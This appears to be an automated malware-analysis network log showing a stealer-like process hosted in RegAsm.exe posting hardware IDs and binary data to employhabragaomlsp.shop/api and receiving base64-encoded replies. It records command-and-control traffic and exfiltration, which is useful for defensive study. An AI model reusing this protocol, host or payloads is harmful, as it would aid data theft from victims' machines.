2024-05-23 22:22:20 UTC	816	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=skopd8t3l0m6d5ngrt1qtf18ol; expires=Mon, 16-Sep-2024 16:08:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pc2OAeovYABkE0Dh7BQWJzldOqwXPwS9Zwh4BJjIUpvxHMlQvH0DnBUbbbNx%2FBCAYMjOvlAqgT2g0TibmjSpHqp%2B0I%2F7G%2FWDnYXZT0UgVqs0JAAnAHTSKjqaUn%2FcCgphBpjpGCiYJk2rpA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871a33ff34398-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49745	188.114.96.3	443	5920	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:21 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19958 Host: employhabragaomlsp.shop
2024-05-23 22:22:21 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:21 UTC	4627	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 Data Ascii: +?2+?2+?o?Mp5p_
2024-05-23 22:22:22 UTC	818	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n8hchhtesejiv6hsic9ds66gdf; expires=Mon, 16-Sep-2024 16:09:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ehks%2BH5MUKGeEY8U0mtnxKgvsVkpkYOTUvgVWKMqwrrqXO5kI6iGwqtk0VHRiHruHS2NCJqt0KLJW1yivNeunfk%2BWs2%2FP%2FTGa6iypZzrcQmbwQ8YzJtrZ%2Bwu155M%2BNptGTXkHergVo55ZA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871ba09c4c3f8-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49746	188.114.96.3	443	3160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:22 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: employhabragaomlsp.shop
2024-05-23 22:22:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-23 22:22:22 UTC	816	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ifmuebot7leim1609ct3sbuh57; expires=Mon, 16-Sep-2024 16:09:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xqub7K3OkAdi1Nd97LsEWPYM5zw%2BBNBscLuf0NPoYdqRu1%2FeklT4DNF4LwLTg50GpHiJVthmdQZHc6Vz%2F3GFt5%2BwRqri61blAQ7Toat4%2BZNgAn7RjaVxFmowp71GvTgP9FQS4S8bClKewg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871bead074344-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:22 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-23 22:22:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49747	188.114.96.3	443	5920	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:23 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5429 Host: employhabragaomlsp.shop
2024-05-23 22:22:23 UTC	5429	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:23 UTC	818	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5s4ujpddrkmf0vfjlt2h90nc24; expires=Mon, 16-Sep-2024 16:09:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xN%2F9Ee%2Fizh96qUGUdeseG2g1c0nauNm9onZQRg9trhdJzoiPDmAr4TnW7VFa886AjXtflV71nI5zHhDBFkBoEu0YmnNtrImzUx%2Fs0jAyiJ%2B%2B80jZnvXGayNKnsGZo%2FUNdkoAzqhhw3NC7g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871c23fd75e79-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:23 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49748	188.114.96.3	443	3160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:23 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: employhabragaomlsp.shop
2024-05-23 22:22:23 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-05-23 22:22:23 UTC	822	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tn3mm8jge2l5tfdc3gv5cce4hl; expires=Mon, 16-Sep-2024 16:09:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYeg7r7z4tROb45I0%2Fe1l1hmQ0U7q5Eon%2BCpJAeHn7P4glcXa8J8y52109%2FQzJgb9%2BeVAHp3%2FwzmMQjIPwstrLwZE2wNNT2NZMM7%2FuQq0e%2FQqfL2Kv%2B2gAyMw4Di58rWPOIL2or6qcwEyQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871c44d39191e-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:23 UTC	547	IN	Data Raw: 64 34 31 0d 0a 4d 53 31 77 63 52 2f 36 2f 79 53 64 69 6e 4a 39 56 55 39 70 42 67 55 62 73 54 52 55 6b 62 34 4a 78 75 33 42 72 6c 74 37 6b 4a 6c 4b 4a 33 6c 54 61 64 6a 46 42 4b 6d 6d 65 48 52 33 50 41 77 6b 50 7a 76 46 52 69 48 30 6b 67 50 50 7a 36 44 4b 65 55 47 77 2f 31 42 42 41 78 51 7a 38 50 59 47 38 50 4a 51 52 33 55 55 59 77 39 2b 45 62 67 39 64 76 54 51 4b 2f 7a 4e 34 39 6b 2b 47 66 58 68 52 55 67 65 41 6e 61 56 6b 57 54 77 37 77 59 63 4f 43 34 61 62 53 74 79 33 68 5a 34 6d 37 63 41 35 49 69 37 6a 47 46 62 73 74 52 55 57 52 45 38 66 6f 6d 55 42 72 47 41 65 33 52 33 4b 68 30 6b 50 7a 75 54 61 48 62 68 33 33 75 6e 67 4c 4c 79 65 55 48 72 78 52 4e 45 42 42 52 74 6d 34 74 4e 38 75 51 42 49 58 64 31 58 7a 59 31 4b 34 45 45 4b 62 4f 30 41 4c 76 6e 79 50 Data Ascii: d41MS1wcR/6/ySdinJ9VU9pBgUbsTRUkb4Jxu3Brlt7kJlKJ3lTadjFBKmmeHR3PAwkPzvFRiH0kgPPz6DKeUGw/1BBAxQz8PYG8PJQR3UUYw9+Ebg9dvTQK/zN49k+GfXhRUgeAnaVkWTw7wYcOC4abSty3hZ4m7cA5Ii7jGFbstRUWRE8fomUBrGAe3R3Kh0kPzuTaHbh33ungLLyeUHrxRNEBBRtm4tN8uQBIXd1XzY1K4EEKbO0ALvnyP
2024-05-23 22:22:23 UTC	1369	IN	Data Raw: 4d 6c 7a 4f 53 36 70 46 4a 79 73 76 78 66 44 30 70 52 50 5a 36 54 52 2f 4c 6f 41 68 63 38 4a 67 35 32 62 48 44 65 57 7a 62 2b 31 6d 53 6e 6a 36 54 47 4d 78 62 34 2f 31 35 43 46 42 4e 39 32 4e 4d 75 6c 49 4e 51 47 43 39 74 55 79 59 6e 57 74 5a 47 4d 66 2f 4b 4b 5a 37 50 79 36 63 6d 56 35 6d 35 45 53 64 35 43 68 58 7a 39 67 62 34 35 46 42 48 64 57 30 44 59 57 52 36 32 46 6b 31 2b 39 64 35 70 4a 32 6c 77 54 77 4c 39 50 35 64 52 52 45 42 64 35 61 62 52 66 62 6a 47 52 6f 77 4b 55 73 71 44 78 4b 34 46 6a 48 72 6e 44 50 6d 7a 34 4c 42 4d 68 58 34 37 46 4d 50 65 6e 68 69 31 76 55 74 35 6f 42 37 64 48 63 71 42 79 51 2f 4f 35 4e 53 4e 2f 66 64 62 36 71 42 70 38 41 2f 46 2f 2f 30 56 55 55 53 46 48 65 51 6c 55 66 79 34 78 38 66 4d 69 41 50 59 6d 74 34 31 68 5a 34 6d Data Ascii: MlzOS6pFJysvxfD0pRPZ6TR/LoAhc8Jg52bHDeWzb+1mSnj6TGMxb4/15CFBN92NMulINQGC9tUyYnWtZGMf/KKZ7Py6cmV5m5ESd5ChXz9gb45FBHdW0DYWR62Fk1+9d5pJ2lwTwL9P5dRREBd5abRfbjGRowKUsqDxK4FjHrnDPmz4LBMhX47FMPenhi1vUt5oB7dHcqByQ/O5NSN/fdb6qBp8A/F//0VUUSFHeQlUfy4x8fMiAPYmt41hZ4m
2024-05-23 22:22:23 UTC	1369	IN	Data Raw: 4e 34 38 38 31 46 50 76 2b 58 46 30 59 48 33 79 4b 6d 6b 2f 32 34 68 45 52 4f 43 59 48 59 58 56 79 33 46 34 35 38 74 46 6d 72 34 75 6a 6a 48 64 78 6d 5a 41 54 53 41 70 54 4a 64 72 64 5a 2f 4c 6e 41 68 77 6d 62 7a 35 6e 61 58 66 55 51 48 61 62 74 33 54 71 35 38 6a 56 55 58 4b 5a 75 31 52 44 55 6b 73 2f 32 4a 78 4b 38 2b 6b 66 47 54 30 6c 43 47 56 31 63 4e 78 65 4f 66 72 64 61 4b 43 4f 71 64 34 72 47 66 37 70 58 30 55 55 48 48 43 55 33 51 69 58 67 33 74 66 4d 44 56 4c 50 43 55 35 2b 56 55 69 38 4e 59 70 6b 59 79 74 77 6a 34 50 73 70 4d 34 55 46 78 37 46 6f 48 31 4c 5a 53 6f 46 78 4e 33 64 55 6b 6b 61 6e 6a 62 55 43 54 38 30 57 69 71 67 61 7a 4a 4e 68 48 79 2b 31 35 4b 46 68 68 32 6d 35 42 43 37 65 49 51 46 7a 49 73 41 57 34 6e 4e 37 73 39 58 62 50 62 63 2b Data Ascii: N4881FPv+XF0YH3yKmk/24hEROCYHYXVy3F458tFmr4ujjHdxmZATSApTJdrdZ/LnAhwmbz5naXfUQHabt3Tq58jVUXKZu1RDUks/2JxK8+kfGT0lCGV1cNxeOfrdaKCOqd4rGf7pX0UUHHCU3QiXg3tfMDVLPCU5+VUi8NYpkYytwj4PspM4UFx7FoH1LZSoFxN3dUkkanjbUCT80WiqgazJNhHy+15KFhh2m5BC7eIQFzIsAW4nN7s9XbPbc+
2024-05-23 22:22:23 UTC	115	IN	Data Raw: 4f 52 7a 67 38 31 56 49 48 68 74 34 6c 35 74 44 38 75 38 62 48 43 55 2f 43 47 42 70 64 5a 4d 59 58 70 69 33 4b 36 4f 58 34 35 52 37 57 64 66 73 55 46 38 55 45 44 33 77 39 6c 6d 78 67 48 73 47 58 30 5a 67 4a 47 42 31 6b 77 35 30 73 39 78 6c 71 49 53 6b 78 7a 49 64 39 76 74 65 52 42 77 64 64 4a 53 56 53 76 6a 36 48 52 6f 2f 4a 77 4a 68 61 0d 0a Data Ascii: ORzg81VIHht4l5tD8u8bHCU/CGBpdZMYXpi3K6OX45R7WdfsUF8UED3w9lmxgHsGX0ZgJGB1kw50s9xlqISkxzId9vteRBwddJSVSvj6HRo/JwJha
2024-05-23 22:22:23 UTC	1369	IN	Data Raw: 33 30 37 33 0d 0a 33 54 51 52 44 58 79 6e 43 58 4d 35 4d 69 4d 50 67 47 79 6f 78 45 50 4e 53 42 4b 75 39 30 75 6c 50 64 65 64 31 77 30 59 77 38 4d 4f 64 52 61 64 71 75 65 4b 36 57 48 70 4d 49 39 43 2f 7a 70 58 55 67 53 46 58 57 51 6d 6b 72 78 35 67 49 58 4e 69 30 46 61 32 39 77 31 31 63 79 39 39 42 73 35 4d 48 4c 70 31 4a 5a 39 65 4d 54 46 31 42 54 56 5a 75 48 58 4c 33 47 47 78 38 77 50 52 31 2f 4a 78 47 34 53 58 69 62 74 33 4c 4d 35 4d 69 4d 50 68 57 79 6f 78 45 50 46 68 68 33 6b 5a 35 50 2b 2b 55 51 46 6a 67 6b 41 32 6c 76 61 39 4a 63 4a 50 66 5a 61 71 75 46 70 38 51 31 46 76 37 2f 51 55 52 53 58 52 58 7a 39 67 62 34 38 46 42 48 64 57 30 72 62 33 46 61 77 55 52 32 6d 37 64 30 36 75 66 49 31 56 46 79 6d 62 74 55 51 31 4a 4c 50 39 69 55 53 76 37 70 47 68 Data Ascii: 30733TQRDXynCXM5MiMPgGyoxEPNSBKu90ulPded1w0Yw8MOdRadqueK6WHpMI9C/zpXUgSFXWQmkrx5gIXNi0Fa29w11cy99Bs5MHLp1JZ9eMTF1BTVZuHXL3GGx8wPR1/JxG4SXibt3LM5MiMPhWyoxEPFhh3kZ5P++UQFjgkA2lva9JcJPfZaquFp8Q1Fv7/QURSXRXz9gb48FBHdW0rb3FawUR2m7d06ufI1VFymbtUQ1JLP9iUSv7pGh
2024-05-23 22:22:23 UTC	1369	IN	Data Raw: 62 32 35 38 33 31 63 39 2b 74 6c 76 72 6f 6d 75 6a 48 64 78 6d 5a 41 54 53 41 70 54 4a 64 72 64 61 76 7a 6e 47 31 39 66 52 68 51 71 44 78 4c 4b 50 6c 32 59 6e 47 79 6f 7a 2f 75 4f 65 52 37 36 38 31 31 4d 46 42 68 78 6c 4a 78 50 2b 65 30 59 47 44 67 71 41 6d 4e 6e 66 38 46 52 4f 2f 72 63 59 4b 32 46 70 38 30 79 57 62 79 54 4f 43 52 53 46 47 58 59 78 51 53 2f 32 68 63 4a 4a 79 35 4c 44 41 78 6d 6e 54 31 65 6d 4d 55 44 7a 2b 54 6a 79 7a 56 5a 71 72 6b 54 51 67 41 53 65 49 71 5a 53 66 54 36 47 78 6b 33 4b 42 6c 6a 61 33 50 63 56 54 37 2b 33 32 4f 32 6a 36 37 4d 4b 77 76 30 38 46 30 50 58 48 73 57 38 39 31 42 35 36 68 49 58 58 63 63 48 47 38 6e 45 62 68 4a 65 4a 69 30 41 4c 33 6e 79 4b 64 35 48 76 36 37 43 77 31 53 45 48 65 56 6b 31 54 37 37 68 73 63 4f 53 55 Data Ascii: b25831c9+tlvromujHdxmZATSApTJdrdavznG19fRhQqDxLKPl2YnGyoz/uOeR76811MFBhxlJxP+e0YGDgqAmNnf8FRO/rcYK2Fp80yWbyTOCRSFGXYxQS/2hcJJy5LDAxmnT1emMUDz+TjyzVZqrkTQgASeIqZSfT6Gxk3KBlja3PcVT7+32O2j67MKwv08F0PXHsW891B56hIXXccHG8nEbhJeJi0AL3nyKd5Hv67Cw1SEHeVk1T77hscOSU
2024-05-23 22:22:23 UTC	1369	IN	Data Raw: 74 35 52 4d 50 72 4f 59 71 47 42 6f 38 67 79 46 76 54 2f 55 45 38 41 46 58 6d 51 6e 6b 76 79 35 68 4d 62 64 32 4e 6a 44 77 77 35 31 45 35 32 71 35 34 72 6c 6f 4b 74 31 7a 59 65 34 2f 45 54 4a 33 6b 4d 4d 2f 44 32 58 35 65 44 65 31 38 77 49 55 73 38 4a 54 6e 58 57 43 54 34 33 57 43 76 67 61 54 44 50 42 50 79 39 46 64 4d 48 42 68 38 6d 35 56 4c 38 75 59 61 46 6a 34 71 42 32 42 67 4f 5a 30 2b 58 5a 69 63 62 4c 7a 50 2b 34 35 35 4d 74 50 57 66 30 67 49 55 78 58 7a 67 67 69 58 67 77 6c 33 58 45 5a 4c 59 32 73 35 69 78 52 32 2f 39 56 6e 72 6f 53 6b 78 6a 63 51 2f 50 42 42 58 52 45 58 66 70 47 65 51 66 62 6d 45 42 67 79 49 77 78 6c 62 48 33 5a 56 54 43 7a 6b 67 50 50 35 4f 50 4c 49 56 6d 71 75 52 4e 6a 45 52 4e 77 67 74 30 75 6c 50 64 65 64 31 77 30 59 77 38 4d Data Ascii: t5RMPrOYqGBo8gyFvT/UE8AFXmQnkvy5hMbd2NjDww51E52q54rloKt1zYe4/ETJ3kMM/D2X5eDe18wIUs8JTnXWCT43WCvgaTDPBPy9FdMHBh8m5VL8uYaFj4qB2BgOZ0+XZicbLzP+455MtPWf0gIUxXzggiXgwl3XEZLY2s5ixR2/9VnroSkxjcQ/PBBXREXfpGeQfbmEBgyIwxlbH3ZVTCzkgPP5OPLIVmquRNjERNwgt0ulPded1w0Yw8M
2024-05-23 22:22:23 UTC	1369	IN	Data Raw: 75 7a 74 41 43 37 77 63 75 6e 49 48 47 5a 6b 42 4e 49 48 6c 4d 6c 32 74 31 4b 38 65 30 51 46 54 45 70 44 6d 4a 74 66 4e 4e 64 4e 66 7a 59 62 61 43 41 6f 38 63 77 47 50 54 2b 57 55 51 55 48 6e 36 65 6d 77 61 78 67 48 74 30 64 79 6f 54 4a 44 38 37 6b 33 59 74 2f 74 42 73 35 4f 66 49 30 33 64 78 6d 65 49 37 4a 48 6c 54 65 70 54 64 48 72 32 6f 47 78 4d 7a 4b 67 74 70 5a 48 48 57 55 6a 7a 32 33 47 4f 32 68 36 50 4c 4b 77 76 79 38 6c 5a 44 45 52 4e 35 6e 70 52 41 2f 4f 78 51 55 56 39 47 59 43 52 67 59 5a 4d 4f 64 4c 50 78 5a 36 4f 6d 70 4e 64 35 63 5a 6e 6b 48 53 64 35 43 68 58 7a 39 67 62 34 35 46 42 48 64 57 30 4b 62 32 31 32 33 6c 55 77 38 4e 64 75 72 6f 36 6b 78 44 51 4c 38 66 52 63 53 78 49 63 65 35 36 63 53 66 6e 76 47 52 34 2f 4b 6b 73 71 44 78 4b 34 46 Data Ascii: uztAC7wcunIHGZkBNIHlMl2t1K8e0QFTEpDmJtfNNdNfzYbaCAo8cwGPT+WUQUHn6emwaxgHt0dyoTJD87k3Yt/tBs5OfI03dxmeI7JHlTepTdHr2oGxMzKgtpZHHWUjz23GO2h6PLKwvy8lZDERN5npRA/OxQUV9GYCRgYZMOdLPxZ6OmpNd5cZnkHSd5ChXz9gb45FBHdW0Kb2123lUw8Nduro6kxDQL8fRcSxIce56cSfnvGR4/KksqDxK4F
2024-05-23 22:22:23 UTC	1369	IN	Data Raw: 72 74 73 2f 37 6a 6e 6c 65 38 65 6c 42 53 52 45 46 66 74 2b 6a 65 4e 6a 2b 47 68 67 6e 4b 68 78 72 4a 7a 65 37 50 56 32 7a 30 79 76 38 7a 5a 71 6b 55 6e 4b 5a 75 31 70 49 43 51 4a 72 6c 59 31 42 76 34 42 37 64 41 68 6a 59 77 38 4d 4f 63 73 57 62 72 47 63 58 71 65 42 72 63 73 76 43 4c 2f 63 52 55 55 56 41 33 71 50 6b 67 61 78 67 48 74 30 64 79 74 4c 50 43 55 71 6e 54 35 64 6d 4a 78 76 74 63 2f 37 6a 6d 6c 4c 71 61 34 41 47 45 4a 42 46 66 4f 43 43 4a 65 44 43 58 64 63 52 6b 74 79 4a 79 47 52 42 48 69 62 74 77 44 6b 6e 65 4f 55 65 31 6d 31 2b 45 46 64 46 42 42 72 6d 39 70 34 77 63 38 4b 45 6a 45 36 47 6c 70 5a 66 73 6c 62 4d 4f 54 4e 4a 37 47 4d 72 63 49 2b 44 37 4b 31 4f 79 52 35 55 33 4c 59 78 51 54 47 71 46 68 66 43 47 4e 6a 44 77 77 35 79 78 5a 75 73 5a Data Ascii: rts/7jnle8elBSREFft+jeNj+GhgnKhxrJze7PV2z0yv8zZqkUnKZu1pICQJrlY1Bv4B7dAhjYw8MOcsWbrGcXqeBrcsvCL/cRUUVA3qPkgaxgHt0dytLPCUqnT5dmJxvtc/7jmlLqa4AGEJBFfOCCJeDCXdcRktyJyGRBHibtwDkneOUe1m1+EFdFBBrm9p4wc8KEjE6GlpZfslbMOTNJ7GMrcI+D7K1OyR5U3LYxQTGqFhfCGNjDww5yxZusZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49751	188.114.96.3	443	5920	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:24 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1234 Host: employhabragaomlsp.shop
2024-05-23 22:22:24 UTC	1234	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; 